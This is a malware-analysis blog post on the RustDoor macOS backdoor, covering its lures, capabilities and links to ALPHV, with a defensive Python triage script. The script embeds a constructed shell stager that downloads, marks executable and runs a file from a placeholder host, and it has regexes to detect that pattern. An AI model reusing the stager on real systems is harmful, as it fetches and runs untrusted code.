The PolySwarm Blog


RustDoor macOS Backdoor

Feb 26, 2024 11:51:18 AM / by The Hivemind

Related Families: GateDoor
Verticals Targeted: Cryptocurrency

Executive Summary

RustDoor is a new macOS backdoor written in Rust. It has been observed targeting companies in the cryptocurrency sector.

Key Takeaways

  • RustDoor is a new macOS backdoor written in Rust.
  • RustDoor has been observed targeting companies in the cryptocurrency sector.
  • GateDoor is a Windows counterpart of RustDoor.
  • RustDoor uses infrastructure linked to the ALPHV ransomware gang, leading industry researchers to speculate about a relationship between the threat actors.

What is RustDoor?

RustDoor is a new macOS backdoor written in Rust that has been observed targeting companies in the cryptocurrency sector. The campaign has been active since at least November 2023, and at least three variants of RustDoor have been identified. Bitdefender recently reported on this activity.

RustDoor, which can run on both Intel-based and Apple Silicon Macs, is distributed under the guise of a Visual Studio update. Some of the first-stage downloaders are shell scripts disguised as PDF files containing job offers; when the victim opens the file, the script downloads and executes the implant while opening a decoy PDF so that nothing looks amiss. Other first-stage payloads arrive as ZIP archives that claim to contain job information. These hold a basic shell script that fetches the implant while displaying a decoy PDF.
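The two properties of the lure chain above (a shell script wearing a .pdf name that fetches and runs a payload while opening a decoy, and an implant that ships for both Intel and Apple Silicon) can be checked with a few lines of triage code. The following is an example written for this post, not Bitdefender's, S2W's or PolySwarm's tooling, and it reproduces no real RustDoor sample, hash or URL: the "job offer" script and the Mach-O universal (fat) header at the bottom are constructed for the example, and the download-and-execute regex is a triage heuristic, not a detection signature.

```python
"""Added triage helpers for the RustDoor lure chain described above.

Example code written for this post, not Bitdefender's, S2W's or PolySwarm's
tooling. SAMPLE_LURE and SAMPLE_FAT are constructed for the example; no real
RustDoor sample, hash or URL is reproduced here.
"""
import re
import struct

PDF_MAGIC = b"%PDF-"

# Mach-O constants from <mach-o/fat.h>, <mach-o/loader.h> and <mach/machine.h>
FAT_MAGIC = 0xCAFEBABE      # fat (universal) header, always big-endian on disk
FAT_MAGIC_64 = 0xCAFEBABF   # 64-bit fat header (32-byte fat_arch_64 entries)
MH_MAGIC = 0xFEEDFACE       # thin 32-bit Mach-O
MH_MAGIC_64 = 0xFEEDFACF    # thin 64-bit Mach-O
CPU_TYPE_X86_64 = 0x01000007
CPU_TYPE_ARM64 = 0x0100000C
CPU_NAMES = {CPU_TYPE_X86_64: "x86_64", CPU_TYPE_ARM64: "arm64"}

# Heuristic: curl/wget on a line that pipes or chains into execution.
DOWNLOAD_EXEC_RE = re.compile(
    rb"\b(curl|wget)\b[^\n]*?(\|\s*(ba|z)?sh\b|&&\s*(chmod|sh|bash|zsh|open)\b)"
)
# `open something.pdf` is how a macOS script shows a decoy document.
DECOY_RE = re.compile(rb"\bopen\b[^\n]*\.(pdf|docx?)\b", re.IGNORECASE)


def classify_lure(name: str, data: bytes) -> dict:
    """Flag a file that claims to be a document but behaves like a stager."""
    findings = []
    # The PDF spec tolerates junk before the header, so search the first 1 KiB
    # instead of requiring the magic at offset 0.
    if name.lower().endswith(".pdf") and PDF_MAGIC not in data[:1024]:
        findings.append("extension_mismatch")
    if data.startswith(b"#!"):
        findings.append("shell_script")
    if DOWNLOAD_EXEC_RE.search(data):
        findings.append("download_and_execute")
    if DECOY_RE.search(data):
        findings.append("decoy_document")
    return {"name": name, "findings": findings, "suspicious": bool(findings)}


def _cpu_name(cputype: int) -> str:
    return CPU_NAMES.get(cputype, "cputype_0x%08x" % (cputype & 0xFFFFFFFF))


def macho_architectures(data: bytes) -> list:
    """Return the CPU architectures a Mach-O file carries; [] if not Mach-O."""
    if len(data) < 8:
        return []
    magic_be = struct.unpack(">I", data[:4])[0]
    if magic_be in (FAT_MAGIC, FAT_MAGIC_64):
        nfat = struct.unpack(">I", data[4:8])[0]
        # Java class files share the 0xCAFEBABE magic (followed by a version
        # number); a real fat header has only a few slices, so an implausible
        # count is treated as "not Mach-O". Heuristic threshold.
        if nfat == 0 or nfat > 20:
            return []
        entry = 32 if magic_be == FAT_MAGIC_64 else 20
        archs = []
        for i in range(nfat):
            off = 8 + i * entry
            if off + 4 > len(data):
                break
            archs.append(_cpu_name(struct.unpack(">i", data[off:off + 4])[0]))
        return archs
    # Thin Mach-O: header is in the file's own byte order; Apple targets are
    # little-endian, so read it that way.
    magic_le = struct.unpack("<I", data[:4])[0]
    if magic_le in (MH_MAGIC, MH_MAGIC_64):
        return [_cpu_name(struct.unpack("<i", data[4:8])[0])]
    return []


def build_fat_header(cputypes) -> bytes:
    """Build a minimal universal-binary header (slices omitted) for testing."""
    hdr = struct.pack(">II", FAT_MAGIC, len(cputypes))
    for i, ct in enumerate(cputypes):
        # fat_arch: cputype, cpusubtype, offset, size, align (log2)
        hdr += struct.pack(">iIIII", ct, 0, 0x4000 * (i + 1), 0x1000, 14)
    return hdr


# Constructed lure modelled on the behaviour described above; not a real sample.
SAMPLE_LURE = b"""#!/bin/sh
curl -s http://stage2.example.invalid/update -o /tmp/.update && chmod +x /tmp/.update && /tmp/.update &
open /tmp/Job_Offer_decoy.pdf
"""
# Constructed universal header covering both architectures RustDoor targets.
SAMPLE_FAT = build_fat_header([CPU_TYPE_X86_64, CPU_TYPE_ARM64])

if __name__ == "__main__":
    print(classify_lure("Job_Offer.pdf", SAMPLE_LURE))
    print(macho_architectures(SAMPLE_FAT))
```

Running it on the constructed lure reports all four findings (extension mismatch, shell script, download-and-execute, decoy document), and the header parser reports `x86_64` and `arm64` for the fat header. On real files, feed `classify_lure` anything a user received with a document extension and `macho_architectures` the downloaded implant; a universal binary is not itself malicious, but it matches the cross-architecture property of this family.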

RustDoor can upload and exfiltrate files and collect information about the infected device. Bitdefender also identified four related Go-based binaries that gather information about the victim system and its network connections and report it to an actor-controlled C2. These binaries can also collect details about the disk, kernel parameters, and configuration values.

Researchers at Bitdefender noted that the attacks in this campaign appear to be targeted. So far, only three victims have been confirmed: two in Hong Kong and one in Lagos, Nigeria.


S2W reportedly discovered RustDoor in December 2023, although Bitdefender is credited with naming the backdoor. S2W researchers also identified a Windows counterpart, which they named GateDoor. GateDoor is written in Go but functions similarly to RustDoor.

Links to Other Threat Actors?

RustDoor uses infrastructure linked to the ALPHV ransomware gang, which we featured in a recent Threat Bulletin. Three of the four C2 servers used by RustDoor overlap with infrastructure previously used by ALPHV or an ALPHV affiliate. Industry researchers have also noted other artifacts and IOCs that suggest a possible relationship with Black Basta. At this time, it is unclear whether the infrastructure is controlled by a single threat actor or belongs to a bulletproof hosting service shared by multiple unrelated actors, so the overlap alone should not be read as attribution.


PolySwarm has multiple samples of RustDoor.
You can use the following CLI command to search for all RustDoor samples in our portal:

$ polyswarm link list -f RustDoor

Topics: Threat Bulletin, Ransomware, ALPHV, Backdoor, macOS, Mac, Apple, RustDoor, GateDoor
